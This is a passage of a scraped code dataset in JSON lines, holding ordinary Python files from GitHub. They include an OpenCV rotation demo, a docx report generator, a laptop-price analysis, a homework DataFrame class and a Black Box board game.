0\n interval = 25\n \n pause = False\n while True:\n if not pause:\n # find major and minor axises.\n MA = np.array([np.cos(np.radians(dreg)) * size[0]/2, np.sin(np.radians(dreg)) * size[0]/2])\n ma = np.array([np.cos(np.radians(dreg + 90)) * size[1]/2, np.sin(np.radians(dreg + 90)) * size[1]/2])\n # init rect.\n rect = cv2.RotatedRect(center, size, dreg)\n points = cv2.boxPoints(rect)\n # empty image.\n img = np.zeros(np.flip(imgSize), np.uint8)\n # rotation anotation.\n cv2.ellipse(img, center.astype(np.int32), (50, 50), 0, 0, dreg, 25, cv2.FILLED)\n # guide lines.\n cv2.line(img, (center[0].astype(np.int32), 0), (center[0].astype(np.int32), imgSize[1]), 50, 1)\n cv2.line(img, (0, center[1].astype(np.int32)), (imgSize[0], center[1].astype(np.int32)), 50, 1)\n cv2.arrowedLine(img, center.astype(np.int32), (center[0].astype(np.int32), imgSize[1]-10), 100, 1, tipLength=0.04)\n cv2.arrowedLine(img, center.astype(np.int32), (imgSize[0]-10, center[1].astype(np.int32)), 100, 1, tipLength=0.04)\n cv2.putText(img, \"y\", (center[0].astype(np.int32)+10, imgSize[1]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, 100, 1)\n cv2.putText(img, \"x\", (imgSize[0]-20, center[1].astype(np.int32)-10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, 100, 1)\n # ellipse\n cv2.ellipse(img, rect, 255, 1)\n # bounding box.\n cv2.polylines(img, [points.astype(np.int32)], isClosed=True, color=100, thickness=1)\n for i, p in enumerate(points.astype(np.int32)):\n cv2.putText(img, str(i), p, cv2.FONT_HERSHEY_SIMPLEX, 0.6, 100, 1)\n # major and minor axises.\n cv2.arrowedLine(img, center.astype(np.int32), (center + MA).astype(np.int32), 255, 1, tipLength=0.1)\n cv2.arrowedLine(img, center.astype(np.int32), (center + ma).astype(np.int32), 255, 1, tipLength=0.1)\n cv2.putText(img, \"MAJOR\", (center + MA).astype(np.int32), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 255, 1)\n cv2.putText(img, \"minor\", (center + ma).astype(np.int32), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 255, 1)\n # rotation anotation.\n cv2.circle(img, center.astype(np.int32), 2, 255, 2)\n cv2.putText(img, f\"{int(dreg)}\", (center + np.array([np.cos(np.radians(dreg/2)) * size[0]/2, np.sin(np.radians(dreg/2)) * size[0]/2])).astype(np.int32), cv2.FONT_HERSHEY_SIMPLEX, 0.6, 255, 1)\n # show.\n cv2.imshow(\"Rotate\", img)\n k = cv2.waitKey(interval)\n if k == ord('q'):\n cv2.destroyAllWindows()\n break\n elif k == ord('s'):\n pause = not pause\n elif k == ord(']'):\n if interval > 10:\n interval -= 5\n elif k == ord('['):\n if interval < 100:\n interval += 5\n # next\n if not pause:\n dreg += 1\n dreg %= 360 \n \n print(\"End!\")\n ","repo_name":"rapee9999/LearnCV","sub_path":"rotate_rect.py","file_name":"rotate_rect.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23512446437","text":"# Python program to illustrate\n# Iterating over a list\ndef list_fn():\n print(\"List Iteration\")\n l = [\"Welcome\", \"to\", \"Python\"]\n for i in l:\n print(i)\n return l\n\n# Iterating over a tuple (immutable)\nprint(\"\\nTuple Iteration\")\nt = (\"welcome\", \"to \", \"python\")\nfor i in t:\n print(i)\n\n# Iterating over a String\nprint(\"\\nString Iteration\")\ns = \"python\"\nfor i in s:\n print(i)\n\n# Iterating over dictionary\nprint(\"\\nDictionary Iteration\")\nd = dict()\nd['xyz'] = 123\nd['abc'] = 345\nfor i in d:\n print(\"%s %d\" % (i, d[i]))\n\n# Iterating over a set\nprint(\"\\nSet Iteration\")\nset1 = {1, 2, 3, 4, 5, 6}\nfor i in set1:\n print(i),\n\n\nif __name__ == \"__main__\":\n list_fn()\n","repo_name":"ValarmathyRamachandran/Basic-Topics-Python-Practice","sub_path":"loops/for.py","file_name":"for.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23656719270","text":"from helper import *\nfrom bs4 import BeautifulSoup\nimport docx\nfrom docx.shared import Pt,Inches,Cm\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT\nfrom docx.shared import RGBColor\nimport os\n\n\ndef __all_data(path):\n # print(html)\n td = read_html(path)\n # td = pd.read_html(html)[0]\n # print(td.head)\n # print(td[4:5])\n # print(td[16:17])\n # a=pd.DataFrame(td[0:20])\n # a=a.values.tolist()\n # print(a)\n # for i in a:\n # print(i)\n alldata = []\n flag = False\n for row in td:\n # print(row)\n if row[2] == 'Color':\n flag = True\n continue\n if flag:\n if row[2].startswith('Statistical'):\n # print('\\n11111\\n',row)\n break\n # print(row)\n items = row[5:11] + row[17:25] + row[31:37]\n alldata.append(items)\n return alldata\n\n\ndef get_img(path):\n with open(path, 'r') as f:\n html = f.read()\n soup = BeautifulSoup(html, 'lxml')\n tables = soup.findAll('table')\n tab = tables[0]\n flag = False\n for tr in tab.findAll('tr'):\n if flag:\n img = tr.findAll('img')\n src=img[0].get('src')\n return src\n for td in tr.findAll('td'):\n text = td.getText()\n if text.startswith('Amplification'):\n # print(text)\n flag = True\n break\n\n\ndef get_all_table(path):\n alldata = __all_data(path=path)\n table = []\n for row in alldata:\n row = list(map(sub, row))\n # print(row)\n table.append(row)\n return table\n\n\n# tables = get_all_tables()\ncolumns = ['Position', 'Sample Name', 'Gene Name', 'Cq', 'Concentration', 'Call', # 'Excluded',\n 'Sample Type', 'Standard', 'Cq Mean', 'Cq Error', 'Concentration Mean', 'Concentration Error',\n 'Replicate Group', 'Dye', # 'Edited Call',\n 'Slope', 'EPF', 'Failure', 'Notes', 'Prep Notes', 'Number']\n\n\ndef all_table2df(table):\n df = pd.DataFrame(table, columns=columns)\n return df\n\n\ndef to_csv(table, path=None):\n df = all_table2df(table)\n # import numpy as np\n # df = df.replace('nan', '')\n # df['Number'] = df['Number'].astype(float)\n # df['Number'] = df['Number'].astype(int)\n # print(df.head())\n df.to_csv('a.csv', index=None)\n\n\ndef html2pdf(table):\n df = all_table2df(table)\n a = df.to_html(index=False)\n # print(a)\n import pdfkit\n options = {\n 'page-size': 'Letter',\n 'encoding': \"UTF-8\",\n 'custom-header': [\n ('Accept-Encoding', 'gzip')\n ]\n }\n path_wk = r'D:\\wkhtmltox\\bin\\wkhtmltopdf.exe' # 安装位置\n config = pdfkit.configuration(wkhtmltopdf=path_wk)\n pdfkit.from_string(a, \"test.pdf\", configuration=config, options=options)\n\n\ndef all_table2doc(table, img, path='all_data.docx'):\n # 转docx\n doc = docx.Document() # 新建文档\n p = doc.add_paragraph('')\n r = p.add_run(r'3. Analysis(实验分析)')\n r.font.bold = True # 加粗\n p = doc.add_paragraph('')\n r = p.add_run(r'Abs Quant')\n r.font.bold = True # 加粗\n #Curves\n p = doc.add_paragraph('')\n p.add_run(r'Ampification Curves')\n p=doc.add_picture(img,width=Inches(6))\n p.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n # Result Table\n p = doc.add_paragraph('')\n p.add_run(r'Result Table')\n\n td = []\n table.insert(0, columns)\n for row in table:\n # items = row[:6] + row[13:14]\n items=row\n td.append(items)\n\n rows, cols = len(td), len(td[0])\n # print(rows, cols)\n table = doc.add_table(rows=rows, cols=cols, style='Table Grid')\n table.columns[1].width = Pt(2)\n table.columns[2].width = Pt(2)\n # 遍历表格\n for r in range(rows):\n for c in range(cols):\n run = table.cell(r, c).paragraphs[0].add_run(td[r][c]) # 填入的内容\n if r == 0:\n # run.font.name = 'Times New Roman' # 设置字体\n # run.font.size = Pt(11) # 设置字号\n run.font.bold = 1 # 设置是否加粗\n # run.font.color.rgb = RGBColor.from_string('00BFFF') # 设置文字颜色\n table.cell(r, c).paragraphs[0].alignment = WD_PARAGRAPH_ALIGNMENT.CENTER # 设置居中\n # for r, row in enumerate(table.rows):\n # for c in range(len(row.cells)):\n # # print(c)\n # row.cells[c].text = td[r][c]\n table.cell(0, 1).width = Cm(5)\n table.cell(0, 2).width = Cm(4)\n # table.autofit = True\n doc.save(path)\n\n\n\nif __name__ == '__main__':\n path = r'data/Demo_10-Fold Dilution/report_resources/abs quant001.html'\n # path = r'data/Demo_Qual Detect Mono Color/report_resources/abs quant001.html'\n table = get_all_table(path=path)\n for i in table:\n print(i)\n # print(tables)\n src = get_img(path)\n print(src)\n img_path = os.path.join(os.path.dirname(path), src)\n all_table2doc(table,img_path)\n to_csv(table)\n\n # with open(path, 'r') as f:\n # html = f.read()\n # soup = BeautifulSoup(html, 'lxml')\n # # img = soup.find_all('img')\n # # src=img[0].get('src')\n # # for i in range(len(img)):\n # # print(img[i].get('src'))\n # tables = soup.findAll('table')\n # tab = tables[0]\n # flag = False\n # for tr in tab.findAll('tr'):\n # if flag:\n # img = tr.findAll('img')\n # print(tr)\n # print(tr.get('src'))\n # print(img[0].get('src'))\n # break\n # for td in tr.findAll('td'):\n # text = td.getText()\n # if text.startswith('Amplification'):\n # print(text)\n # flag = True\n # break\n","repo_name":"chenwi/part_time_job_yg","sub_path":"codes/get_all_data.py","file_name":"get_all_data.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15279524040","text":"from GenericRequest import GenericRequest\n\nclass AddPlayerToClanRequest(GenericRequest):\n \"Accepts a given player to the clan\"\n\n def __init__(self, session, playerId):\n super(AddPlayerToClanRequest, self).__init__(session)\n self.url = session.serverURL + \"clan_applications.php\"\n self.requestData[\"pwd\"] = session.pwd\n self.requestData['action'] = \"process\"\n self.requestData['request%s' % playerId] = 1\n def parseResponse(self):\n if \"Clan application(s)\" in self.responseText:\n self.responseData[\"success\"] = True\n else:\n self.responseData[\"success\"] = False\n","repo_name":"BearMinimum98/redditbot","sub_path":"kol/request/AddPlayerToClanRequest.py","file_name":"AddPlayerToClanRequest.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19942945624","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\n\n# Exploratory Data Analysis - Laptops Pricing\n\nurl = \"https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-DA0101EN-Coursera/laptop_pricing_dataset_mod2.csv\"\n\n\ndf = pd.read_csv(url, header=0)\n# print(df.head(6))\n\n# Task 1 - Visualize individual feature patterns\n# Generate regression plots for each of the parameters \"CPU_frequency\", \"Screen_Size_inch\" and \"Weight_pounds\" against \"Price\". \n# Also, print the value of correlation of each feature with \"Price\".\n\n\n\n# CPU_frequency plot\nsns.regplot(x=\"CPU_frequency\", y=\"Price\", data=df)\nplt.ylim(0,)\n\n\n# Screen_Size_inch plot\nsns.regplot(x=\"Screen_Size_inch\", y=\"Price\", data=df)\nplt.ylim(0,)\n\n# Weight_pounds plot\nsns.regplot(x=\"Weight_pounds\", y=\"Price\", data=df)\nplt.ylim(0,)\n\n# Correlation values of the three attributes with Price\nfor param in [\"CPU_frequency\", \"Screen_Size_inch\",\"Weight_pounds\"]:\n print(f\"Correlation of Price and {param} is \", df[[param,\"Price\"]].corr())\n\n# Interpretation: \"CPU_frequency\" has a 36% positive correlation with the price of the laptops. The other two parameters have weak correlation with price.\n\n# Categorical features - Generate Box plots for the different feature that hold categorical values. These features would be \"Category\", \"GPU\", \"OS\", \"CPU_core\", \"RAM_GB\", \"Storage_GB_SSD\"\n\n\n# Category Box plot\nsns.boxplot(x=\"Category\", y=\"Price\", data=df)\n\n# GPU Box plot\nsns.boxplot(x=\"GPU\", y=\"Price\", data=df)\n\n# OS Box plot\nsns.boxplot(x=\"OS\", y=\"Price\", data=df)\n\n# CPU_core Box plot\nsns.boxplot(x=\"CPU_core\", y=\"Price\", data=df)\n\n# RAM_GB Box plot\nsns.boxplot(x=\"RAM_GB\", y=\"Price\", data=df)\n\n\n# Storage_GB_SSD Box plot\nsns.boxplot(x=\"Storage_GB_SSD\", y=\"Price\", data=df)\n\n\n# Task 2 - Descriptive Statistical Analysis - Generate the statistical description of all the features being used in the data set. Include \"object\" data types as well.\n\n\nprint(df.describe())\nprint(df.describe(include=['object']))\n\n# Task 3 - GroupBy and Pivot Tables - Group the parameters \"GPU\", \"CPU_core\" and \"Price\" to make a pivot table and visualize this connection using the pcolor plot.\n\n\n# Create the group\ndf_gptest = df[['GPU','CPU_core','Price']]\ngrouped_test1 = df_gptest.groupby(['GPU','CPU_core'],as_index=False).mean()\nprint(grouped_test1)\n\n# Create the Pivot table\ngrouped_pivot = grouped_test1.pivot(index='GPU',columns='CPU_core')\nprint(grouped_pivot)\n\n\n# Create the Plot\nfig, ax = plt.subplots()\nim = ax.pcolor(grouped_pivot, cmap='RdBu')\n\n#label names\nrow_labels = grouped_pivot.columns.levels[1]\ncol_labels = grouped_pivot.index\n\n#move ticks and labels to the center\nax.set_xticks(np.arange(grouped_pivot.shape[1]) + 0.5, minor=False)\nax.set_yticks(np.arange(grouped_pivot.shape[0]) + 0.5, minor=False)\n\n#insert labels\nax.set_xticklabels(row_labels, minor=False)\nax.set_yticklabels(col_labels, minor=False)\n\nfig.colorbar(im)\n\n\n\n# Task 4 - Pearson Correlation and p-values\n# Use the scipy.stats.pearsonr() function to evaluate the Pearson Coefficient and the p-values for each parameter tested above. \n# This will help you determine the parameters most likely to have a strong effect on the price of the laptops.\n\nfor param in ['RAM_GB','CPU_frequency','Storage_GB_SSD','Screen_Size_inch','Weight_pounds','CPU_core','OS','GPU','Category']:\n pearson_coef, p_value = stats.pearsonr(df[param], df['Price'])\n print(param)\n print(\"The Pearson Correlation Coefficient for \",param,\" is\", pearson_coef, \" with a P-value of P =\", p_value)\n\n\n\nplt.show()\n\n","repo_name":"Marcin-Lewandowski/Data_Science","sub_path":"EDA_Laptops_Pricing.py","file_name":"EDA_Laptops_Pricing.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17787989391","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if needle is \"\":\n return 0\n if haystack is \"\":\n return -1\n i = 0\n while i < len(haystack)-len(needle)+1: # 遍历源字符串\n save_i = i # 防止因为比对造成haystack的索引移动\n j = 0\n while haystack[i] == needle[j]:\n if j == len(needle)-1:\n return i - j\n j += 1\n i += 1\n i = save_i + 1\n return -1\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.strStr(\"mississippi\", \"issip\"))\n","repo_name":"Witness521/leetcode","sub_path":"数列/实现strStr().py","file_name":"实现strStr().py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41820691494","text":"import argparse\nimport json\nimport logging\n\nimport requests\n\nfrom rest_api import headers\nfrom utils import RData, AttrDict\n\n\ndef handle(data):\n logging.info(__name__)\n data = AttrDict.from_dict(data)\n assert data.repo\n assert data.branch\n r = requests.get(f'https://api.github.com/repos/{data.repo}/branches',\n headers=headers)\n r_data = json.loads(r.content)\n branch_filtered = [x for x in r_data if x['name'] == data.branch]\n\n rd = RData(False)\n if len(branch_filtered) != 1:\n print('false')\n raise RuntimeError(branch_filtered)\n branch_data = branch_filtered[0]\n if 'last_commit_sha' not in data.keys() or branch_data['commit']['sha'] != data.last_commit_sha:\n print('true')\n rd.data['last_commit_sha'] = branch_data['commit']['sha']\n rd.result = True\n else:\n print('false')\n rd.result = False\n return rd\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('repo')\n parser.add_argument('branch')\n parser.add_argument('last_commit_sha')\n\n handle(parser.parse_args().__dict__)\n","repo_name":"QZLin/ActionsTrigger","sub_path":"script/simple_new_commit.py","file_name":"simple_new_commit.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2415658905","text":"# Assignment-2\r\n\r\n# Abishek Lakshmirathan\r\n\r\nimport datetime\r\nimport csv\r\nfrom collections import OrderedDict\r\nfrom math import sqrt\r\n\r\nclass DataFrame(object):\r\n\r\n @classmethod\r\n\r\n def from_csv(cls, file_path, delimiting_character=',', quote_character='\"'):\r\n with open(file_path, 'rU') as infile:\r\n reader = csv.reader(infile, delimiter=delimiting_character, quotechar=quote_character)\r\n data_collection = []\r\n for index, row in enumerate(reader):\r\n if index == 559:\r\n row[2] = row[2].replace(',', '')\r\n data_collection.append(row)\r\n return cls(list_of_lists=data_collection)\r\n\r\n\r\n # Task 3\r\n\r\n @classmethod\r\n def get_column_type(self, column, col_collection):\r\n is_int = True\r\n for col in col_collection:\r\n try:\r\n if isinstance(int(col), int) is False:\r\n is_int = False\r\n except ValueError:\r\n is_int = False\r\n if is_int:\r\n return int\r\n else:\r\n\r\n # Checking if all items of the column are dates\r\n is_date = True\r\n # try:\r\n for col in col_collection:\r\n if isinstance(col, int):\r\n is_date = False\r\n else:\r\n try:\r\n if not (isinstance(datetime.datetime.strptime(col, '%m/%d/%y %H:%M'), datetime.datetime)):\r\n is_date = False\r\n except ValueError:\r\n is_date = False\r\n if is_date:\r\n\r\n # converting each entry into Datetime objects\r\n\r\n for index, entry in enumerate(col_collection):\r\n col_collection[index] = datetime.datetime.strptime(entry, '%m/%d/%y %H:%M')\r\n return datetime\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n return None\r\n\r\n\r\n @classmethod\r\n def min(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type=self.get_column_type(column, col_collection)\r\n if col_type == int:\r\n return min(col_collection)\r\n elif col_type == datetime:\r\n return min(col_collection)\r\n else:\r\n return None\r\n\r\n @classmethod\r\n def max(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n if col_type == int:\r\n return max(col_collection)\r\n elif col_type == datetime:\r\n return max(col_collection)\r\n else:\r\n return None\r\n\r\n @classmethod\r\n def median(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n if col_type == int or col_type == datetime:\r\n col_collection = sorted(col_collection)\r\n if len(col_collection) % 2 == 1:\r\n median = (len(col_collection)+1)/2\r\n return col_collection[median]\r\n else:\r\n median1 = len(col_collection)/2\r\n median2 = median1+1\r\n return col_collection[(median1 + median2)/2]\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n @classmethod\r\n def mean(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n sum=0\r\n if col_type == int:\r\n for col in col_collection:\r\n sum = sum + int(col)\r\n mean = sum/len(col_collection)\r\n return mean\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n\r\n @classmethod\r\n def sum(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n summation=0\r\n if col_type == int:\r\n for col in col_collection:\r\n summation = summation + int(col)\r\n return summation\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n @classmethod\r\n def std(self, column):\r\n col_collection = [row[column] for row in df.data]\r\n col_type = self.get_column_type(column, col_collection)\r\n sum = 0\r\n if (col_type == int):\r\n for col in col_collection:\r\n sum=sum+int(col)\r\n num_items = len(col_collection)\r\n mean = sum / num_items\r\n differences = [int(x) - mean for x in col_collection]\r\n sq_differences=0\r\n for d in differences:\r\n lis = [d ** 2 for d in differences]\r\n for item in lis:\r\n sq_differences = sq_differences + item\r\n return sqrt(sq_differences/num_items)\r\n else:\r\n raise TypeError('The values in the column are strings and this operation cannot be performed.')\r\n\r\n # Task 4\r\n @classmethod\r\n def add_rows(self, list_of_lists):\r\n length=len(df.data[0])\r\n for row in list_of_lists:\r\n if(len(row) == length):\r\n df.data.append(row)\r\n else:\r\n raise ValueError('The length of the row does not match to that of the existing data')\r\n df.data=[OrderedDict(zip(df.header, row)) for row in df.data]\r\n\r\n # Task 5\r\n @classmethod\r\n def add_columns(self,list_of_values,col_name):\r\n length_rows_data = len(df.data)\r\n length_values = len(list_of_values)\r\n if(length_rows_data == length_values):\r\n for index, headername in enumerate(df.header):\r\n df.data[index][col_name]=list_of_values[index]\r\n df.header.append(col_name)\r\n else:\r\n raise ValueError('The length of the column does not match to that of the existing data')\r\n\r\n # Task 2\r\n # Stripping whitespaces\r\n def __init__(self, list_of_lists, header=True):\r\n for each_list in list_of_lists:\r\n for index, word in enumerate(each_list):\r\n each_list[index] = word.strip()\r\n if header:\r\n # Assigning header\r\n self.header = list_of_lists[0]\r\n self.data = list_of_lists[1:]\r\n else:\r\n self.header = ['column' + str(index + 1) for index, column in enumerate(list_of_lists)]\r\n self.data = list_of_lists\r\n\r\n # Task 1\r\n # header name uniqueness\r\n\r\n is_unique = (all(list_of_lists[0].count(x) == 1 for x in list_of_lists[0]))\r\n if not is_unique:\r\n raise TypeError('Elements in the header are not unique!')\r\n self.data = [OrderedDict(zip(self.header, row)) for row in self.data]\r\n\r\n def __getitem__(self, item):\r\n # for rows only\r\n if isinstance(item, (int, slice)):\r\n return self.data[item]\r\n\r\n # for columns only\r\n elif isinstance(item, (str, unicode)):\r\n return [row[item] for row in self.data]\r\n\r\n # for rows and columns\r\n elif isinstance(item, tuple):\r\n if isinstance(item[0], list) or isinstance(item[1], list):\r\n if isinstance(item[0], list):\r\n row_collection = [row for index, row in enumerate(self.data) if index in item[0]]\r\n else:\r\n row_collection = self.data[item[0]]\r\n if isinstance(item[1], list):\r\n if all([isinstance(thing, int) for thing in item[1]]):\r\n return [[column_value for index, column_value in enumerate([value for value in row.itervalues()]) if index in item[1]] for row in row_collection]\r\n elif all([isinstance(thing, (str, unicode)) for thing in item[1]]):\r\n return [[row[column_name] for column_name in item[1]] for row in row_collection]\r\n else:\r\n raise TypeError('Exception has occurred')\r\n else:\r\n return [[value for value in row.itervalues()][item[1]] for row in row_collection]\r\n else:\r\n if isinstance(item[1], (int, slice)):\r\n return [[value for value in row.itervalues()][item[1]] for row in self.data[item[0]]]\r\n elif isinstance(item[1], (str, unicode)):\r\n return [row[item[1]] for row in self.data[item[0]]]\r\n else:\r\n raise TypeError('I don\\'t know how to handle this...')\r\n\r\n # for lists of column names\r\n elif isinstance(item, list):\r\n return [[row[column_name] for column_name in item] for row in self.data]\r\n\r\n def get_rows_where_column_has_value(self, column_name, value, index_only=False):\r\n if index_only:\r\n return [index for index, row_value in enumerate(self[column_name]) if row_value==value]\r\n else:\r\n return [row for row in self.data if row[column_name] == value]\r\n\r\ninfile = open('SalesJan2009.csv')\r\nlines = infile.readlines()\r\nlines = lines[0].split('\\r')\r\ndata = [l.split(',') for l in lines]\r\nthings = lines[559].split('\"')\r\ndata[559] = things[0].split(',')[:-1] + [things[1].replace(',', '')] + things[-1].split(',')[1:]\r\ndf = DataFrame(list_of_lists=data)\r\n","repo_name":"abishekrathan/BIA-660---Web-Analytics","sub_path":"Assignment 2/DataFrame.py","file_name":"DataFrame.py","file_ext":"py","file_size_in_byte":9531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15440146635","text":"from copy import deepcopy\n\nclass BlackBoxGame:\n \"\"\"Represent a Black Box object\"\"\"\n\n def __init__(self, atoms):\n \"\"\"Initialize the 10x10 board and score. Accept atoms as a parameter and label atoms on board.\"\"\"\n self._board = [['.' for _ in range(10)] for _ in range(10)]\n for atom in atoms:\n self._board[atom[0]][atom[1]] = 'a'\n self._score = 25\n self._atoms = len(atoms)\n self._disp = deepcopy(self._board)\n # a: atom\n # h: hit atom\n # r: wrong atom guess\n\n # x: already chosen enter/exit\n\n def is_border(self, row, col):\n \"\"\"Set the border for the board, used by guessing player for shooting rays\"\"\"\n corners = [(0, 0), (0, 9), (9, 0), (9, 9)]\n return (row == 0 or row == 9 or col == 0 or col == 9) and ((row, col) not in corners)\n\n def is_atom(self, row, col):\n \"\"\"Return position of the atom\"\"\"\n return self._board[row][col] in 'ah'\n\n def auto_increase(self, row, col):\n \"\"\"Increase row and column to direct ray to exit and get exit square\"\"\"\n if row == 0:\n return 1, 0\n\n if row == 9:\n return -1, 0\n\n if col == 0:\n return 0, 1\n\n if col == 9:\n return 0, -1\n\n def check_reflection(self, row, col):\n \"\"\"Check the next column row and column for an atom, return True if it exists, reflection\n condition is met \"\"\"\n corners_inc = [(1, 1), (1, -1), (-1, 1), (-1, -1)]\n for (i, j) in corners_inc:\n try:\n if self.is_atom(row + i, col + j):\n return True\n except:\n pass\n\n return False\n\n def check_deflection(self, row, col, i, j):\n \"\"\"Check the four side corners of the atoms to see if the ray is hitting it, return the exit ray as deflected\n 90 degree \"\"\"\n c1 = self.is_atom(row + 1, col + 1)\n c2 = self.is_atom(row - 1, col + 1)\n c3 = self.is_atom(row - 1, col - 1)\n c4 = self.is_atom(row + 1, col - 1)\n\n if (c1 and c2) or (c2 and c3) or (c3 and c4) or (\n c4 and c1): # if top right, bottom right, top left, or bottom left squares are atoms\n return -i, -j\n\n if c1 or c3: # if top left and bottom right corner squares are atoms\n return -j, -i\n\n if c2 or c4: # if top right and bottom left corner squares are atoms\n return j, i\n\n return i, j\n\n def modify_score(self, row, col, penalty):\n \"\"\"If the ray hits an atom, change the name of the atom to another letter to record a hit, else, subtract 5\n points from the total score \"\"\"\n if penalty == 5:\n if self._board[row][col] in 'rh' or self.is_border(row, col):\n return\n\n self._board[row][col] = 'r'\n else: # 'x' marks a square that has already been chosen\n if self._board[row][col] == 'x':\n return\n self._board[row][col] = 'x'\n\n self._score -= penalty\n\n def shoot_ray(self, row, col):\n \"\"\"Only allow shooting rays from border squares. Check for reflection and deflection, redirect ray as needed\"\"\"\n if not self.is_border(row, col): # return false if square is not in border squares\n return False\n\n self.modify_score(row, col, 1)\n if self.check_reflection(row, col): # return tuples of exit border square\n return row, col\n i, j = self.auto_increase(row, col)\n row += i\n col += j\n\n while not self.is_border(row, col):\n self._disp[row][col] = ' '\n if self.is_atom(row, col): # return none if no exit border square exists\n return None\n\n i, j = self.check_deflection(row, col, i, j)\n row += i\n col += j\n\n self.modify_score(row, col, 1)\n return row, col\n\n def guess_atom(self, row, col):\n \"\"\"Take guessed input as row and column and record hit if the guess is correct. Subtract points for wrong\n guess \"\"\"\n if self._board[row][col] == 'a': # if guess is correct,mark square as h(hit)\n self._board[row][col] = 'h'\n self._atoms -= 1\n return True\n\n self.modify_score(row, col, 5)\n\n return False\n\n def get_score(self):\n \"\"\"Return the score\"\"\"\n return self._score\n\n def atoms_left(self):\n \"\"\"Return the remaining atoms\"\"\"\n return self._atoms\n\n def printBoard(self, stats):\n \"\"\"Print out the board to track if methods are working properly\"\"\"\n if stats == 1:\n board = deepcopy(self._board)\n else:\n board = deepcopy(self._disp)\n board[0][0] = board[9][9] = board[0][9] = board[9][0] = ' '\n print(\" 0 1 2 3 4 5 6 7 8 9\")\n for i in range(len(board)):\n print(i, end=' ')\n for j in range(len(board[0])):\n print(board[i][j], end='')\n if j == len(board[0]) - 1:\n print(' ' + str(i), end='')\n print(end=' ')\n if i == len(board) - 1:\n print(\"\\n 0 1 2 3 4 5 6 7 8 9\")\n else:\n print()\n print()\n print()\n self._disp = deepcopy(self._board)\n\n def feedback(self, stats):\n \"\"\"Return the board, get_score, and atom_left to provide feedback on progress\"\"\"\n self.printBoard(stats)\n print(f\"Score: {self.get_score()}\")\n print(f\"Atoms Left: {self.atoms_left()}\\n\\n\")\n","repo_name":"mhson281/PythonProjects","sub_path":"BlackBox/BlackBox.py","file_name":"BlackBox.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"30195547142","text":"'''#Desenvolva um programa que leia o nome, idade e sexo\r\nde 4 pessoas. No final do programa, mostre:\r\n- A média de idade do grupo\r\n- Qual é o nome do homem mais velho\r\n- Quantas mulheres têm menos de 21 anos'''\r\nprint('=' * 50)\r\nprint((' ' * 10), 'Programa \\033[1;4mDESAFIO56\\033[m iniciado.')\r\nprint('=' * 50)\r\n\r\nsoma = 0\r\nmais_velho = 0\r\nnovas = 0\r\nnome2 = 'vazio'\r\n\r\nprint('\\033[1;4mDados das pessoas\\033[m')\r\nfor cont in range(1,5):\r\n nome = str(input('Digite o nome da pessoa {}: '.format(cont)))\r\n idade = int(input('Digite a idade da pessoa {}: '.format(cont)))\r\n sexo = str(input('Digite o sexo da pesoa (M ou F) {}: '.format(cont)))\r\n print('-' * 37)\r\n soma += idade\r\n if cont == 1:\r\n if sexo == 'M':\r\n mais_velho = idade\r\n nome2 = nome\r\n else:\r\n if sexo == 'M':\r\n if idade > mais_velho:\r\n mais_velho = idade\r\n nome2 = nome\r\n else:\r\n if idade < 21:\r\n novas += 1\r\nprint('_' * 50)\r\n\r\nprint('A média das idades é \\033[33m{}\\033[m.\\n'\r\n 'O nome do homem mais velho é: \\033[33m{}\\033[m.\\n'\r\n 'A quantidade de mulheres abaixo de 21 é \\033[33m{}\\033[m.'\r\n .format((soma / 4), nome2, novas))\r\n\r\nprint('=' * 50)\r\nprint('Fim do programa.')\r\n","repo_name":"alex-gsantos/cursos_em_video","sub_path":"desafio56.py","file_name":"desafio56.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6800616999","text":"# -*- coding: 